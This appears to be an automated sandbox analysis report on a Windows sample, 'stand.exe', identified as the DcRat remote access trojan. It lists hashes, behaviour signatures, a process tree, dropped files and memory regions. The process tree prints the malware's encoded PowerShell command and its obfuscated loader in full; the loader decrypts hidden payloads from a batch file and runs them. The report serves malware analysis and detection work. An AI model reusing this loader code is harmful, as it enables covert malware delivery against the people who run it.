Analysis

  • max time kernel
    92s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25-01-2025 00:53

General

  • Target

    stand.exe

  • Size

    40.8MB

  • MD5

    9901c3d5708e8490d8ba6d3732fd4a64

  • SHA1

    a40f732caa8e91909dc929df14ad003aeb9bde42

  • SHA256

    067672927a61dc4b5d2c1850c4b6219ff42537b0758475dae2a43ddb0250f0c8

  • SHA512

    8f310f41f3366a65be2f43437796cae84c0a8e0881d7ee1488468cd41a66f4b45e6ffcd85447ff935856b5fd9de601f2551cd710e8a50adc1c30641627acc856

  • SSDEEP

    393216:f1Du8BtuBw2FEL3Z3aLUoQvo6LP/SgbSpYvKEh1EdKwlGQKPJuGsiTfREsrgCYfC:fMguj8Q4VfvCqFTrYZ7ORuV0gAX

Malware Config

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Dcrat family
  • DCRat payload 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 13 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\stand.exe
    "C:\Users\Admin\AppData\Local\Temp\stand.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1256
    • C:\Windows\system32\cmd.exe
      cmd.exe /C call powershell -E QQBkAGQALQBUAHkAcABlACAAQAAiAAoAIAAgACAAIAB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AAoAIAAgACAAIAB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AAoAIAAgACAAIABwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAEMAbwBuAHMAbwBsAGUAVwBpAG4AZABvAHcAVQB0AGkAbABzACAAewAKACAAIAAgACAAIAAgACAAIABbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQAKACAAIAAgACAAIAAgACAAIABwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEcAZQB0AEMAbwBuAHMAbwBsAGUAVwBpAG4AZABvAHcAKAApADsACgAgACAAIAAgACAAIAAgACAACgAgACAAIAAgACAAIAAgACAAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQAKACAAIAAgACAAIAAgACAAIABwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEcAZQB0AFAAYQByAGUAbgB0ACgASQBuAHQAUAB0AHIAIABoAFcAbgBkACkAOwAKAAoAIAAgACAAIAAgACAAIAAgAFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgApAF0ACgAgACAAIAAgACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAYgBvAG8AbAAgAFMAaABvAHcAVwBpAG4AZABvAHcAKABJAG4AdABQAHQAcgAgAGgAVwBuAGQALAAgAGkAbgB0ACAAbgBDAG0AZABTAGgAbwB3ACkAOwAKACAAIAAgACAAIAAgACAAIAAKACAAIAAgACAAIAAgACAAIABwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAASQBuAHQAUAB0AHIAIABHAGUAdABUAGEAcgBnAGUAdABXAGkAbgBkAG8AdwAoACkAIAB7AAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAASQBuAHQAUAB0AHIAIABjAG8AbgBzAG8AbABlAFcAaQBuAGQAbwB3ACAAPQAgAEcAZQB0AEMAbwBuAHMAbwBsAGUAVwBpAG4AZABvAHcAKAApADsACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdABQAHQAcgAgAHAAYQByAGUAbgB0AFcAaQBuAGQAbwB3ACAAPQAgAEcAZQB0AFAAYQByAGUAbgB0ACgAYwBvAG4AcwBvAGwAZQBXAGkAbgBkAG8AdwApADsACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAcABhAHIAZQBuAHQAVwBpAG4AZABvAHcAIAA9AD0AIABJAG4AdABQAHQAcgAuAFoAZQByAG8AKQAgAHsACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAAYwBvAG4AcwBvAGwAZQBXAGkAbgBkAG8AdwA7AAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAAcABhAHIAZQBuAHQAVwBpAG4AZABvAHcAOwAKACAAIAAgACAAIAAgACAAIAB9AAoAIAAgACAAIAB9AAoAIgBAAAoACgBbAEMAbwBuAHMAbwBsAGUAVwBpAG4AZABvAHcAVQB0AGkAbABzAF0AOgA6AFMAaABvAHcAVwBpAG4AZABvAHcAKABbAEMAbwBuAHMAbwBsAGUAVwBpAG4AZABvAHcAVQB0AGkAbABzAF0AOgA6AEcAZQB0AFQAYQByAGcAZQB0AFcAaQBuAGQAbwB3ACgAKQAsACAAMAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA=
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4860
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -E QQBkAGQALQBUAHkAcABlACAAQAAiAAoAIAAgACAAIAB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AAoAIAAgACAAIAB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AAoAIAAgACAAIABwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAEMAbwBuAHMAbwBsAGUAVwBpAG4AZABvAHcAVQB0AGkAbABzACAAewAKACAAIAAgACAAIAAgACAAIABbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQAKACAAIAAgACAAIAAgACAAIABwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEcAZQB0AEMAbwBuAHMAbwBsAGUAVwBpAG4AZABvAHcAKAApADsACgAgACAAIAAgACAAIAAgACAACgAgACAAIAAgACAAIAAgACAAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQAKACAAIAAgACAAIAAgACAAIABwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEcAZQB0AFAAYQByAGUAbgB0ACgASQBuAHQAUAB0AHIAIABoAFcAbgBkACkAOwAKAAoAIAAgACAAIAAgACAAIAAgAFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgApAF0ACgAgACAAIAAgACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAYgBvAG8AbAAgAFMAaABvAHcAVwBpAG4AZABvAHcAKABJAG4AdABQAHQAcgAgAGgAVwBuAGQALAAgAGkAbgB0ACAAbgBDAG0AZABTAGgAbwB3ACkAOwAKACAAIAAgACAAIAAgACAAIAAKACAAIAAgACAAIAAgACAAIABwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAASQBuAHQAUAB0AHIAIABHAGUAdABUAGEAcgBnAGUAdABXAGkAbgBkAG8AdwAoACkAIAB7AAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAASQBuAHQAUAB0AHIAIABjAG8AbgBzAG8AbABlAFcAaQBuAGQAbwB3ACAAPQAgAEcAZQB0AEMAbwBuAHMAbwBsAGUAVwBpAG4AZABvAHcAKAApADsACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdABQAHQAcgAgAHAAYQByAGUAbgB0AFcAaQBuAGQAbwB3ACAAPQAgAEcAZQB0AFAAYQByAGUAbgB0ACgAYwBvAG4AcwBvAGwAZQBXAGkAbgBkAG8AdwApADsACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAcABhAHIAZQBuAHQAVwBpAG4AZABvAHcAIAA9AD0AIABJAG4AdABQAHQAcgAuAFoAZQByAG8AKQAgAHsACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAAYwBvAG4AcwBvAGwAZQBXAGkAbgBkAG8AdwA7AAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAAcABhAHIAZQBuAHQAVwBpAG4AZABvAHcAOwAKACAAIAAgACAAIAAgACAAIAB9AAoAIAAgACAAIAB9AAoAIgBAAAoACgBbAEMAbwBuAHMAbwBsAGUAVwBpAG4AZABvAHcAVQB0AGkAbABzAF0AOgA6AFMAaABvAHcAVwBpAG4AZABvAHcAKABbAEMAbwBuAHMAbwBsAGUAVwBpAG4AZABvAHcAVQB0AGkAbABzAF0AOgA6AEcAZQB0AFQAYQByAGcAZQB0AFcAaQBuAGQAbwB3ACgAKQAsACAAMAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA=
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4336
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ferzt12j\ferzt12j.cmdline"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3232
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA9DC.tmp" "c:\Users\Admin\AppData\Local\Temp\ferzt12j\CSC6641F065A8045B788FC1A80151A78F6.TMP"
            5⤵
              PID:2908
      • C:\Windows\system32\cmd.exe
        cmd.exe /C call C:\Users\Admin\AppData\Local\Temp\0a3d16499458c600638ec5e6d6c1bd53.bat
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4836
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ICpOoyhUti8BdlSJuUCEIa6Q39T7JjCqop5o7I6byi8='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZmZQPrw6g3+sWWIFVPCrdA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $UCWxB=New-Object System.IO.MemoryStream(,$param_var); $ncHMf=New-Object System.IO.MemoryStream; $LIAho=New-Object System.IO.Compression.GZipStream($UCWxB, [IO.Compression.CompressionMode]::Decompress); $LIAho.CopyTo($ncHMf); $LIAho.Dispose(); $UCWxB.Dispose(); $ncHMf.Dispose(); $ncHMf.ToArray();}function execute_function($param_var,$param2_var){ $zLBxA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ByaAN=$zLBxA.EntryPoint; $ByaAN.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\0a3d16499458c600638ec5e6d6c1bd53.bat';$tYUab=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\0a3d16499458c600638ec5e6d6c1bd53.bat').Split([Environment]::NewLine);foreach ($bLFgp in $tYUab) { if ($bLFgp.StartsWith(':: ')) { $FNCNo=$bLFgp.Substring(3); break; }}$payloads_var=[string[]]$FNCNo.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4092

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      3db5a3b556b01c59c5812cb86abb674e

      SHA1

      3848e5419d5c47879f159247e4f1b08005674cf0

      SHA256

      218d487f881ce9640acd16f7476b445471b83671569e99973f77d0bbf6c42ffa

      SHA512

      3eb6575d3e476053a65b2631b0cd0d584056ca476058ee2706c69fe10b0502460c40f8985f1f4666e42fba2809924f6dc34ba2e9b2629217542e45cb3640adcd

    • C:\Users\Admin\AppData\Local\Temp\0a3d16499458c600638ec5e6d6c1bd53.bat

      Filesize

      5.2MB

      MD5

      06fc9a6f1de1042d9248e64db6640406

      SHA1

      30b9aa888c1413deec441ad4aa20d8f838b0b801

      SHA256

      91290c338166483cc3bf9196c1091cc76a021716ebb9de7d4ec35470c3360560

      SHA512

      773baceebd84f09cd53d56765009724e4d706f09b0a741ff3b498c9cd39e01dcad471f1ad0f5d2e08a3ed6e4163ffc4564472b2bddd69862a4040dde9fe80321

    • C:\Users\Admin\AppData\Local\Temp\RESA9DC.tmp

      Filesize

      1KB

      MD5

      006ccef188e22519f7085fa96461d3cb

      SHA1

      0e25fc677cb9c37343042eaa2ebeb8f023a7383f

      SHA256

      d50fb68ac8c2fd4a514923e9e278d5bbb9204ab04089a8cbc554174a736d1769

      SHA512

      ae2588863bf30a04285008a8a15920da9ab7b68f2b8479297afcb181d6238f242c4b411049ae8b20ab8bd74b81f2b1442bc8259b443087f91ca1978b9344e12d

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_u2x1dgia.t54.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\ferzt12j\ferzt12j.dll

      Filesize

      3KB

      MD5

      a16602bac4267a201f470f782ee071c5

      SHA1

      ea21c1595fa0cdf0efe3bb9433b0af5b5783b10b

      SHA256

      0ea228db4013aea66d63c71c4aa52640c667b101e84f64816efdcc578962bb75

      SHA512

      7b6e119a34c72ee22a79e57b2267846d544adc5c90c9e8236ab1bafa259748920df3a808eed2bfdc48650fd65ec788976fd9f17b4c63c6c5cd30453e6e08b481

    • \??\c:\Users\Admin\AppData\Local\Temp\ferzt12j\CSC6641F065A8045B788FC1A80151A78F6.TMP

      Filesize

      652B

      MD5

      eb830d746cd88ea0872115e754d06c60

      SHA1

      f094fc60a61e4954d72c8eb9a2847dc40beb2f00

      SHA256

      71921db415820f72ff3c9fd97f5d07f1fb5f5892de80d142f6be533613d053b3

      SHA512

      b502a88e5f5e93233976be406778ead1b6daa003f38769abe5560790d81e67a8e93fc095c49d9b76d718f2c26559a554549564204f0d21afcdcde28b99741076

    • \??\c:\Users\Admin\AppData\Local\Temp\ferzt12j\ferzt12j.0.cs

      Filesize

      737B

      MD5

      3d57f8f44297464baafa6aeecd3bf4bc

      SHA1

      f370b4b9f8dba01fbcad979bd663d341f358a509

      SHA256

      415199eec01052503978381a4f88f4cd970b441fedce519905990ed8b629b0f1

      SHA512

      4052dd65ca0a505a36c7c344671afcadb8f82cc24b0d1d8362f61565f9d37782e00332908444f6a95286dd1785d074762b27c20be1f361eec67807fad052d798

    • \??\c:\Users\Admin\AppData\Local\Temp\ferzt12j\ferzt12j.cmdline

      Filesize

      369B

      MD5

      14b9e9035baed12abf75ca03af79e0ec

      SHA1

      8b5ac846b4227e2c7cf895c193cc097dc0db1c16

      SHA256

      ddb66d2bf93b4abdfb8ef9b8a43831ce99f6a5e9e06d99b55b6cd51901e56bb1

      SHA512

      06234a5f8297e703f6655afa71e972b70102b23406f55ab9b3c895e328e56e24038875c2e010cdca7dd57d1e56dca47e3da8e83be36265b99a90721bd16b7a4d

    • memory/4092-47-0x0000000005EB0000-0x0000000006204000-memory.dmp

      Filesize

      3.3MB

    • memory/4092-37-0x0000000005D80000-0x0000000005DE6000-memory.dmp

      Filesize

      408KB

    • memory/4092-54-0x0000000014110000-0x00000000147C4000-memory.dmp

      Filesize

      6.7MB

    • memory/4092-53-0x0000000005210000-0x0000000005218000-memory.dmp

      Filesize

      32KB

    • memory/4092-52-0x000000000A3E0000-0x000000000A3FA000-memory.dmp

      Filesize

      104KB

    • memory/4092-33-0x0000000004F20000-0x0000000004F56000-memory.dmp

      Filesize

      216KB

    • memory/4092-34-0x00000000055E0000-0x0000000005C08000-memory.dmp

      Filesize

      6.2MB

    • memory/4092-35-0x0000000005510000-0x0000000005532000-memory.dmp

      Filesize

      136KB

    • memory/4092-36-0x0000000005D10000-0x0000000005D76000-memory.dmp

      Filesize

      408KB

    • memory/4092-51-0x000000000AA90000-0x000000000B10A000-memory.dmp

      Filesize

      6.5MB

    • memory/4092-50-0x0000000006410000-0x000000000645C000-memory.dmp

      Filesize

      304KB

    • memory/4092-49-0x00000000063C0000-0x00000000063DE000-memory.dmp

      Filesize

      120KB

    • memory/4336-3-0x00007FFB29E63000-0x00007FFB29E65000-memory.dmp

      Filesize

      8KB

    • memory/4336-4-0x000002B577210000-0x000002B577232000-memory.dmp

      Filesize

      136KB

    • memory/4336-15-0x00007FFB29E60000-0x00007FFB2A921000-memory.dmp

      Filesize

      10.8MB

    • memory/4336-32-0x00007FFB29E60000-0x00007FFB2A921000-memory.dmp

      Filesize

      10.8MB

    • memory/4336-14-0x00007FFB29E60000-0x00007FFB2A921000-memory.dmp

      Filesize

      10.8MB

    • memory/4336-28-0x000002B577390000-0x000002B577398000-memory.dmp

      Filesize

      32KB